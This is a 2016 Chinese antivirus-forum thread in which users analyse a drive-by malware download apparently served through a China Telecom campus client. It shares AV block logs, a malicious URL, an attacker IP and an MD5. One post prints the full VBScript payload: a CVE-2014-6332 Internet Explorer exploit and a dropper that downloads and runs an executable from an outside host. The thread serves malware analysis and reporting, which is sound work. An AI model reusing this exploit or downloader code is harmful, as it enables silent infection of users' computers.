夭寿啦！疑似天翼校园客户端网页挂马…………各位跟进……

zhou0197

样本：

密码：infected

一个exe（目测网马？），一个JS脚本…………

目测是江苏那边学校的天翼校园客户端…………

是恶意下载器来着……

VT结果：

https://www.virustotal.com/zh-cn ... nalysis/1462875978/

https://www.virustotal.com/zhcn/ ... nalysis/1462888860/

下面是卡巴的拦截记录：

10.05.2016 21.44.53;已阻止危险网址;hXXp://kfdown.oss-cn-hangzhou.aliyuncs.com/1.exe;hXXp://kfdown.oss-cn-hangzhou.aliyuncs.com/1.exe;网址;KSN;天翼校园客户端分享版;05/10/2016 21:44:53
10.05.2016 21.44.51;下载被阻止;hXXp://222.186.57.42:8080/js.js;Trojan-Clicker.JS.Iframe.gb;hXXp://222.186.57.42:8080/js.js;天翼校园客户端分享版;木马程序;05/10/2016 21:44:51
10.05.2016 21.44.51;检测到的对象 ( 文件 ) ;hXXp://222.186.57.42:8080/js.js;Trojan-Clicker.JS.Iframe.gb;hXXp://222.186.57.42:8080/js.js;天翼校园客户端分享版;木马程序;05/10/2016 21:44:51


欢迎各位扫描党，分析党进入…………

以及欢迎国内外（特别是国内几家的）积极上报啊（如果有没有拦截的话）…………

如果有能联系到天翼客户端的官人的，也请出手吧…………

qqddliu

2016-05-10 22:28:38        应用程序保护(运行应用程序)     操作:阻止
进程路径:C:\Documents and Settings\Administrator\桌面\1.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\kinst_168_108.exe
2016-05-10 22:28:20        应用程序保护(运行应用程序)     操作:阻止
进程路径:C:\Documents and Settings\Administrator\桌面\1.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\1332280.exe
2016-05-10 22:28:16        应用程序保护(运行应用程序)     操作:阻止
进程路径:C:\Documents and Settings\Administrator\桌面\1.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\Baidu_Setup_2.2.200.1470_ftn_1050123723.exe
2016-05-10 22:27:33        应用程序保护(运行应用程序)     操作:阻止
进程路径:C:\Documents and Settings\Administrator\桌面\1.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\V8._85416_20150820204011.exe
2016-05-10 22:26:59        应用程序保护(运行应用程序)     操作:阻止
进程路径:C:\Documents and Settings\Administrator\桌面\1.exe
文件路径:C:\Documents and Settings\Administrator\Local Settings\Temp\55902abv_1202000517.exe

第二个双击运行出错。右键添加360压缩然后360云报安全。

XywCloud

呵呵哒
看来电信得寸进尺了。
我要看看浙江这边啥时候有这么恶心
浙江电信闪讯两次“小试牛刀”【没这帖这么恐怖而已，也就搞搞浏览器劫持和进程注入而已，诱导用户修改主页为某网址导航（不点名，防止被喷）】均被本人当天发现并收集证据然后工信部举报
【按照11楼给的线索，我顺藤摸瓜... CVE-2014-6332】
贴个最终执行的代码，VBScript我懒得格式化了。
如果直接访问11楼给的页面的话，中间过程有一段js脚本判断了电脑存在的软件，电脑内装有360安全卫士、360安全浏览器、金山毒霸、金山卫士、腾讯电脑管家的电脑将不会进行后续跳转【只不过判断方法比较粗暴，准确率不是很高】，也就不会跳到我给的代码对应的页面（这个页面实际上是被document.write写上去的）。
[mw_shl_code=html,true]<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">

<head></head>

<body>
    <SCRIPT LANGUAGE="VBScript">
        function runmumaa() On Error Resume NextSet objWsh = CreateObject("Wscript.Shell") objWsh.run "cmd.exe /c echo >>C:\Windows\Temp\smss.vbs Set xPost=createObject("
        "Microsoft.XMLHTTP"
        ") & echo >>C:\Windows\Temp\smss.vbs xPost.Open "
        "GET"
        ","
        "hxxp://kfdown.oss-cn-hangzhou.aliyuncs.com/1.exe" '和谐处理防止意外
        ",0 & echo >>C:\Windows\Temp\smss.vbs xPost.Send() & echo >>C:\Windows\Temp\smss.vbs set sGet=createObject("
        "ADODB.Stream"
        ") & echo >>C:\Windows\Temp\smss.vbs sGet.Mode=3 & echo >>C:\Windows\Temp\smss.vbs sGet.Type=1 & echo >>C:\Windows\Temp\smss.vbs sGet.Open() & echo >>C:\Windows\Temp\smss.vbs sGet.Write xPost.ResponseBody & echo >>C:\Windows\Temp\smss.vbs sGet.SaveToFile "
        "C:\Windows\Temp\kstpladdala.exe"
        ",2", 0o bjWsh.run "cscript.exe C:\Windows\Temp\smss.vbs", 0, truewscript.sleep 10000 objWsh.run "C:\Windows\Temp\kstpladdala.exe"
        document.write(Err.Description) end
        function
    </script>
    <SCRIPT LANGUAGE="VBScript">
        dim aa() dim ab() dim a0dim a1dim a2dim a3dim win9xdim intVersiondim rndadim funclassdim myarrayBegin()
        function Begin() On Error Resume Next info = Navigator.UserAgent
        if (instr(info, "Win64") > 0) then exit
        function end
        if if (instr(info, "MSIE") > 0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
        else exit
        function end
        if win9x = 0...e Next dim type1, type2, type3 Over = False a0 = a0 + a3 a1 = a0 + 2 a2 = a0 + & h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1 = 1 ab(0) = 1.123456789012345678901234567890 aa(a0) = 10 If(IsObject(aa(a1 - 1)) = False) Then
        if (intVersion < 4) then mem = cint(a0 + 1) * 16 j = vartype(aa(a1 - 1)) if ((j = mem + 4) or(j * 8 = mem + 8)) then
            if (vartype(aa(a1 - 1)) < > 0) Then If(IsObject(aa(a1)) = False) Then type1 = VarType(aa(a1)) end
            if end
        if
        else redim Preserve aa(a0) exit
        function end
        if
        else if (vartype(aa(a1 - 1)) < > 0) Then If(IsObject(aa(a1)) = False) Then type1 = VarType(aa(a1)) end
        if end
        if end
        if end
        if If(type1 = & h2f66) Then Over = True End If If(type1 = & hB9AD) Then Over = True win9x = 1 End If redim Preserve aa(a0) end functionfunction ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0) = 0 aa(a1) = add + 4 ab(0) = 1.69759663316747E-313 ReadMemo = lenb(aa(a1)) ab(0) = 0 redim Preserve aa(a0) end
        function
    </script>
</body>

</html>[/mw_shl_code]

心痛的伤不起

avg 毫无疑问的双miss了，不过我等了很久才有反应是怎么回事

275751198

类型：
感染型病毒(Win32/Trojan.Clicker.c9b)

描述：
感染型病毒(Win32/Trojan.Clicker.c9b)

扫描引擎：
360云查杀引擎

文件路径：
D:\下载文件存储文件夹\123\新建文件夹\新建文件夹 (3)\js.js

文件指纹(MD5)：
16cab6f05512023c0a2b6de54ef1da5b

zhou0197

XywCloud 发表于 2016-5-10 22:53
呵呵哒
看来电信得寸进尺了。
我要看看浙江这边啥时候有这么恶心

现在我靠闪讯路由器撑着，就是个openwrt……

XywCloud

zhou0197 发表于 2016-5-10 23:02
现在我靠闪讯路由器撑着，就是个openwrt……

闪讯很久没改拨号参数了，只不过那恶心的心跳检测...

icedream89

- -
js ess9miss

zhou0197

XywCloud 发表于 2016-5-10 23:06
闪讯很久没改拨号参数了，只不过那恶心的心跳检测...

路由器可以对抗心跳…………毕竟是一直开着的……

XywCloud

zhou0197 发表于 2016-5-10 23:10
路由器可以对抗心跳…………毕竟是一直开着的……

这倒是没错
上次闪讯搞劫持的时候，我跟工信部举报，工信部帮我转给电信总公司，过了几天，那边的客服打电话跟我解释说
“您好！有关闪讯劫持浏览器主页的问题，经过我们工程师确认，在您举报的那个时间点，我们的服务器遭到了攻击...”